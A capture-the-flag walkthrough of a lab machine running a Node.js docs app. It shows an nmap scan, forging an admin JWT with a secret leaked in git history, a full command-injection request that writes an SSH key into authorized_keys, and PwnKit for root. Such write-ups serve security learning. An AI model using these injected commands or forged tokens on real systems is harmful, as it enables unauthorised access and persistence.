Overall

Used Skill

  • node.js
  • git leak
  • jwt

Rating

  • ⭐⭐☆☆☆☆☆☆☆☆

Recon

nmap

~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.120
Nmap scan report for 10.10.11.120
Host is up (0.40s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
|   256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_  256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/17%OT=22%CT=1%CU=44381%PV=Y%DS=2%DC=T%G=Y%TM=62332FE
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   397.90 ms 10.10.14.1
2   397.73 ms 10.10.11.120

Stats: 0:01:12 elapsed; 1 hosts completed (1 up), 0 undergoing Script Post-Scan
NSE Timing: About 0.00% done
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.82 seconds

Get Shell

  • Port 80 serves the web page, from which the source code can be downloaded; the application itself runs on port 3000.
  • There is an /api/priv API that requires the theadmin account. The JWT is sent in the auth-token header, and the token is signed with the environment variable TOKEN_SECRET as the JWT key.
  • Browsing the git log turns up the removed TOKEN_SECRET. It was removed but never changed afterwards, so that key can be used to produce a theadmin JWT:
    > const TOKEN_SECRET='gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE'
    undefined
    > const jwt = require('jsonwebtoken')
    undefined
    > jwt.sign({ _id: '123', name: 'theadmin' , email:'aa'}, TOKEN_SECRET )
    'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA'
    
  • The /api/logs endpoint has a command injection: the parameter is concatenated directly into the command. Through this endpoint an SSH key is written to ~/.ssh/authorized_keys.
GET /api/logs?file=index.js%3becho%20'ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQDuXAKp6lilCgdGpsrip1Zx8Ex%2bwC8Y9OlElgzsCs2gyh2RleVA26cwq2uLwF%2bO4lVtLunxGbvcN97gCVKb%2bEstkjSRmMkhCrmb7hRO3mvvul770f2333iMcd4xtQCTBXbYjdFdR7IQAp8p9iSrYUeyU%2fLnKMFeboKRY4kFhIuSvavy5mflJalTKq%2bBhGZd3DCKHk%2bcbH4FLcoMy9hTy3Js%2bzaw28Td%2bLo4oTm2LP%2fW2w%2fwopgCy5FWv531udIYT8AQxX47IOSloRqOeRfyX3SV9jdXVv0AutPq1REykxW14Clv2xbR%2fddQfcCmbMBSp8lXpR%2btkhDNdk82rawaX7HJMmJAY%2bg%2fQEgoEePOEfppawCsFwdzTdAoTCU2kfl6CNx3rB%2bF9CAP8Twgom5Mt%2flYPi2N%2fZEhRo2OCK9Sx5PZx79UAHnO0WeQc5BWeUYJrBacBuvnaFCejcJHFP5LNti5xMI1FvmNMwlFO7%2bPsmIZnZfSxbhg9FP%2fy1ixD3eoymk%3d%20eethan1%40Magdalene2'%20%3e%20%2fhome%2fdasith%2f.ssh%2fauthorized_keys HTTP/1.1
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA
Host: 10.10.11.120:3000
  • Finally, ssh in to get a shell.
ssh -i ~/tmp/id_rsa dasith@10.10.11.120

Privilege Escalation

  • Running linpeas.sh shows Sudo version 1.8.31, which has CVE-2021-3156. I tried https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit without success; its README specifically notes using sudoedit to tell whether the target is exploitable, and after trying that it turned out not to be exploitable.
  • In the end I used PwnKit to get root.